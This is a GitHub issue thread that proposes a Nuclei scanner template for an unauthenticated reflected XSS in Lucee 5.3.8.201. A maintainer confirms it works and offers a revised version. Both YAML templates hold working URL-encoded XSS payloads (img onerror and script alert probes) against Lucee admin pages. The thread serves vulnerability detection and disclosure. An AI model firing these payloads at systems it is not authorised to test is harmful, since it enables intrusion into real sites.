### ISSUE TITLE
[nuclei-template] - Lucee Unauthenticated XSS

### ISSUE THREAD

**Issue by incogbyte** [projectdiscovery/nuclei-templates#2823]
**Template Details**

Unauthenticated XSS from lucee version  5.3.8.201

```yaml

id: Lucee-xss-prober

info:
  name: Lucee version: 5.3.8.201 XSS
  author: incogbyte
  severity: medium
  tags: xss,generic
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('daac097c52dccdb689c5878450cc2cef')%3elujb7/admin/imgProcess.cfm"
      - "{{BaseURL}}/lucee/adminef34o%3cimg%20src%3da%20onerror%3dalert('daac097c52dccdb689c5878450cc2cef')%3eoh7sl/imgProcess.cfm"
      - "{{BaseURL}}/lucee/admin/imgProcess.cfm?x5cya%3cscript%3ealert('daac097c52dccdb689c5878450cc2cef')%3c%2fscript%3eamshw=1"
      - "{{BaseURL}}/luceehn65f%3cimg%20src%3da%20onerror%3dalert('daac097c52dccdb689c5878450cc2cef')%3erx6cz/admin/server.cfm"
      - "{{BaseURL}}/luceehueex%3cimg%20src%3da%20onerror%3dalert('daac097c52dccdb689c5878450cc2cef')%3ela33j/form.cfm"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "daac097c52dccdb689c5878450cc2cef"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

      - type: status
        status:
          - 200
```
Pocs

![image](https://user-images.githubusercontent.com/53656948/135861327-90ce4331-cafc-47a4-b3f8-a91bb3d6aecc.png)

![image](https://user-images.githubusercontent.com/53656948/135861760-427e4979-6dde-4e48-b774-2626fa0b5c24.png)

**Comment by ehsandeep** [comment]
@incogbyte thank you for sharing this and I can confirm it's working, do you think is it necessary to include multiple payloads in case they are separate issues or affected by the same issue? also, do you have any references to add in template?

Here is an updated version of the above template with improved matchers, let me know what you think about it.

```yaml
id: lucee-xss

info:
  name: Lucee Unauthenticated Reflected XSS 
  author: incogbyte
  severity: medium
  tags: lucee,xss
  
requests:
  - method: GET
    path:
      - "{{BaseURL}}/lucees3ezf%3cimg%20src%3da%20onerror%3dalert('{{randstr}}')%3elujb7/admin/imgProcess.cfm"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=a onerror=alert('{{randstr}}')>"
          - "MissingIncludeException"
          - "lucee-err"
        part: body
        condition: and
```
